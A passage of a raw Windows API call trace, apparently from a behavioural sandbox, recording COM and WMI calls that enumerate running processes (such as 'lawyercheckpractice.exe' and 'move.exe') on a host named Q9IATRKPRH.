[7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0212.704] WbemDefPath:IUnknown:AddRef (This=0x560efa0) returned 0x3 [0212.704] WbemDefPath:IUnknown:QueryInterface (in: This=0x560efa0, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0212.704] WbemDefPath:IUnknown:QueryInterface (in: This=0x560efa0, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0212.704] WbemDefPath:IUnknown:QueryInterface (in: This=0x560efa0, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x5479360) returned 0x0 [0212.704] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5479360, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0212.704] WbemDefPath:IUnknown:Release (This=0x5479360) returned 0x3 [0212.704] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0212.704] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0212.704] WbemDefPath:IUnknown:QueryInterface (in: This=0x560efa0, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0212.704] WbemDefPath:IUnknown:Release (This=0x560efa0) returned 0x2 [0212.704] WbemDefPath:IUnknown:Release (This=0x560efa0) returned 0x1 [0212.704] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0212.704] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0212.704] WbemDefPath:IUnknown:QueryInterface (in: This=0x560efa0, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x560efa0) returned 0x0 [0212.704] WbemDefPath:IUnknown:AddRef (This=0x560efa0) returned 0x3 [0212.704] WbemDefPath:IUnknown:Release (This=0x560efa0) returned 0x2 [0212.704] WbemDefPath:IWbemPath:SetText (This=0x560efa0, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2308\"") returned 0x0 [0212.704] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0212.704] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0212.705] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0212.705] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0212.705] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0212.705] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0212.705] IWbemClassObject:Get (in: This=0x5611430, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x267f950*=0, plFlavor=0x267f954*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="lawyercheckpractice.exe", varVal2=0x0), pType=0x267f950*=8, plFlavor=0x267f954*=0) returned 0x0 [0212.705] SysStringByteLen (bstr="lawyercheckpractice.exe") returned 0x2e [0212.705] SysStringByteLen (bstr="lawyercheckpractice.exe") returned 0x2e [0212.705] IWbemClassObject:Get (in: This=0x5611430, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x267f950*=8, plFlavor=0x267f954*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="lawyercheckpractice.exe", varVal2=0x0), pType=0x267f950*=8, plFlavor=0x267f954*=0) returned 0x0 [0212.705] SysStringByteLen (bstr="lawyercheckpractice.exe") returned 0x2e [0212.705] SysStringByteLen (bstr="lawyercheckpractice.exe") returned 0x2e [0212.705] CoTaskMemAlloc (cb=0x4) returned 0x5612248 [0212.705] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x5612248, puReturned=0x267acc0 | out: apObjects=0x5612248*=0x56115c8, puReturned=0x267acc0*=0x1) returned 0x0 [0213.297] IUnknown:QueryInterface (in: This=0x56115c8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x56115c8) returned 0x0 [0213.297] IUnknown:QueryInterface (in: This=0x56115c8, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0213.297] IUnknown:QueryInterface (in: This=0x56115c8, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0213.297] IUnknown:AddRef (This=0x56115c8) returned 0x3 [0213.297] IUnknown:QueryInterface (in: This=0x56115c8, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0213.297] IUnknown:QueryInterface (in: This=0x56115c8, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0213.297] IUnknown:QueryInterface (in: This=0x56115c8, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x56115cc) returned 0x0 [0213.298] IMarshal:GetUnmarshalClass (in: This=0x56115cc, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0213.298] IUnknown:Release (This=0x56115cc) returned 0x3 [0213.298] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0213.298] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0213.298] IUnknown:QueryInterface (in: This=0x56115c8, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0213.298] IUnknown:Release (This=0x56115c8) returned 0x2 [0213.298] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0213.298] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0213.298] IUnknown:QueryInterface (in: This=0x56115c8, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x56115c8) returned 0x0 [0213.298] IUnknown:AddRef (This=0x56115c8) returned 0x4 [0213.298] IUnknown:Release (This=0x56115c8) returned 0x3 [0213.298] IUnknown:Release (This=0x56115c8) returned 0x2 [0213.298] CoTaskMemFree (pv=0x5612248) [0213.298] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0213.298] IUnknown:AddRef (This=0x56115c8) returned 0x3 [0213.298] IWbemClassObject:Get (in: This=0x56115c8, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0213.299] IWbemClassObject:Get (in: This=0x56115c8, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2316\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0213.299] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2316\"") returned 0x66 [0213.299] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2316\"") returned 0x66 [0213.299] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0213.299] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0213.299] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0213.299] IUnknown:Release (This=0x6d0cac) returned 0x1 [0213.300] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x5612248) returned 0x0 [0213.300] WbemDefPath:IUnknown:QueryInterface (in: This=0x5612248, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0213.300] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5612248, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x560f080) returned 0x0 [0213.300] WbemDefPath:IUnknown:Release (This=0x5612248) returned 0x0 [0213.300] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f080, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x560f080) returned 0x0 [0213.300] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f080, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0213.300] WbemDefPath:IUnknown:AddRef (This=0x560f080) returned 0x3 [0213.301] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f080, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0213.301] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f080, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0213.301] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f080, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x5612258) returned 0x0 [0213.301] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5612258, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0213.301] WbemDefPath:IUnknown:Release (This=0x5612258) returned 0x3 [0213.301] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0213.301] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0213.301] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f080, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0213.301] WbemDefPath:IUnknown:Release (This=0x560f080) returned 0x2 [0213.301] WbemDefPath:IUnknown:Release (This=0x560f080) returned 0x1 [0213.301] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0213.301] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0213.301] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f080, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x560f080) returned 0x0 [0213.301] WbemDefPath:IUnknown:AddRef (This=0x560f080) returned 0x3 [0213.301] WbemDefPath:IUnknown:Release (This=0x560f080) returned 0x2 [0213.301] WbemDefPath:IWbemPath:SetText (This=0x560f080, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2316\"") returned 0x0 [0213.301] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0213.301] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0213.301] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0213.301] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0213.301] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0213.301] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0213.301] IWbemClassObject:Get (in: This=0x56115c8, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26801ec*=0, plFlavor=0x26801f0*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="move.exe", varVal2=0x0), pType=0x26801ec*=8, plFlavor=0x26801f0*=0) returned 0x0 [0213.302] SysStringByteLen (bstr="move.exe") returned 0x10 [0213.302] SysStringByteLen (bstr="move.exe") returned 0x10 [0213.302] IWbemClassObject:Get (in: This=0x56115c8, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26801ec*=8, plFlavor=0x26801f0*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="move.exe", varVal2=0x0), pType=0x26801ec*=8, plFlavor=0x26801f0*=0) returned 0x0 [0213.302] SysStringByteLen (bstr="move.exe") returned 0x10 [0213.302] SysStringByteLen (bstr="move.exe") returned 0x10 [0213.302] CoTaskMemAlloc (cb=0x4) returned 0x5612288 [0213.302] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x5612288, puReturned=0x267acc0 | out: apObjects=0x5612288*=0x5612900, puReturned=0x267acc0*=0x1) returned 0x0 [0213.344] IUnknown:QueryInterface (in: This=0x5612900, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x5612900) returned 0x0 [0213.345] IUnknown:QueryInterface (in: This=0x5612900, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0213.345] IUnknown:QueryInterface (in: This=0x5612900, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0213.345] IUnknown:AddRef (This=0x5612900) returned 0x3 [0213.345] IUnknown:QueryInterface (in: This=0x5612900, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0213.345] IUnknown:QueryInterface (in: This=0x5612900, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0213.345] IUnknown:QueryInterface (in: This=0x5612900, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x5612904) returned 0x0 [0213.345] IMarshal:GetUnmarshalClass (in: This=0x5612904, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0213.345] IUnknown:Release (This=0x5612904) returned 0x3 [0213.345] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0213.345] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0213.345] IUnknown:QueryInterface (in: This=0x5612900, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0213.346] IUnknown:Release (This=0x5612900) returned 0x2 [0213.346] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0213.346] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0213.346] IUnknown:QueryInterface (in: This=0x5612900, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x5612900) returned 0x0 [0213.346] IUnknown:AddRef (This=0x5612900) returned 0x4 [0213.346] IUnknown:Release (This=0x5612900) returned 0x3 [0213.346] IUnknown:Release (This=0x5612900) returned 0x2 [0213.346] CoTaskMemFree (pv=0x5612288) [0213.346] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0213.346] IUnknown:AddRef (This=0x5612900) returned 0x3 [0213.346] IWbemClassObject:Get (in: This=0x5612900, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0213.347] IWbemClassObject:Get (in: This=0x5612900, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2324\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0213.347] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2324\"") returned 0x66 [0213.347] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2324\"") returned 0x66 [0213.347] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0213.347] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0213.347] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0213.347] IUnknown:Release (This=0x6d0cac) returned 0x1 [0213.348] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x5612288) returned 0x0 [0213.349] WbemDefPath:IUnknown:QueryInterface (in: This=0x5612288, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0213.349] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5612288, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, 